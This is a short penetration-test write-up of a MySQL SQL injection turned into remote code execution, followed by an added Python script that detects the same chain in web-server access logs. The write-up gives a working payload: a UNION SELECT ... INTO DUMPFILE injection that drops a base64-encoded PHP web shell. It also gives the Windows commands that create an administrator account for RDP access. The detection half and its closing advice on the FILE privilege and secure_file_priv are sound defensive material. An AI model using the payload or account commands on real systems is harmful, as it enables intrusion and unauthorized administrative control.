SQL Injection & Remote Code Execution [MySQL]
We used sqlmap to verify the parameter, which revealed that it has a SQL injection vulnerability.
We can use the SQL injection to create a file with INTO DUMPFILE and write a simple backdoor encoded with base64.
system($_GET["cmd"]); base64 > c3lzdGVtKCRfR0VUWyJjbWQiXSk7
y=1') UNION ALL SELECT NULL,...,NULL,"<?php eval(base64_decode('c3lzdGVtKCRfR0VUWyJjbWQiXSk7')); ?>",...,NULL into dumpfile 283shell.php -- -
We can then access the backdoor and execute the "whoami" command.
Then, using the net user command, we create an account to use RDP.
net user sa *password* /add
and add the sa account to the Administrators local group
net localgroup Administrators sa /add
Log in over RDP with our credentials.
Finally, we are able to log in to RDP.
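The chain above leaves a recognizable trail in the web server's access log: an INTO DUMPFILE request, requests to the file it created, and account-creation commands passed through that file. The following is an added example, not part of the original write-up, that correlates those three stages; the log lines, the file name up.php and the parameter names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (not from the original page); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:02:13 +0000] "GET /item.php?id=1%27)%20UNION%20ALL%20SELECT%20NULL,NULL%20INTO%20DUMPFILE%20%27up.php%27--%20- HTTP/1.1" 200 0
203.0.113.7 - - [01/Jan/2024:10:02:40 +0000] "GET /up.php?cmd=whoami HTTP/1.1" 200 24
203.0.113.7 - - [01/Jan/2024:10:03:05 +0000] "GET /up.php?cmd=net+user+sa+x+%2Fadd HTTP/1.1" 200 40
198.51.100.9 - - [01/Jan/2024:10:04:00 +0000] "GET /search.php?q=net+user+guide HTTP/1.1" 200 900
"""

REQ = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')
# SQL file-write clause and the file name that follows it
FILE_WRITE = re.compile(r"\binto\s+(dumpfile|outfile)\s+['\"]?([\w./\\-]+)", re.I)
# Windows account creation or admin-group change passed as a parameter value
ACCOUNT = re.compile(
    r"\bnet1?\s+(user\s+.+/add|localgroup\s+administrators\s+.+/add)", re.I)

def analyze(log_text):
    """Return (line_no, client_ip, finding, file_name) tuples in log order."""
    findings = []
    dropped = set()  # base names of files written through the injection
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQ.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        query = unquote_plus(url.query)  # decode %xx and '+' before matching
        w = FILE_WRITE.search(query)
        if w:
            name = w.group(2).replace("\\", "/").rsplit("/", 1)[-1]
            dropped.add(name)
            findings.append((n, ip, "sqli-file-write", name))
            continue
        page = url.path.rsplit("/", 1)[-1]
        if page in dropped:  # only requests to a file the injection created
            kind = "account-change" if ACCOUNT.search(query) else "dropped-file-access"
            findings.append((n, ip, kind, page))
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

On the database side, the file write in the first stage requires the MySQL FILE privilege and is constrained by the secure_file_priv setting, so both are worth auditing alongside the logs.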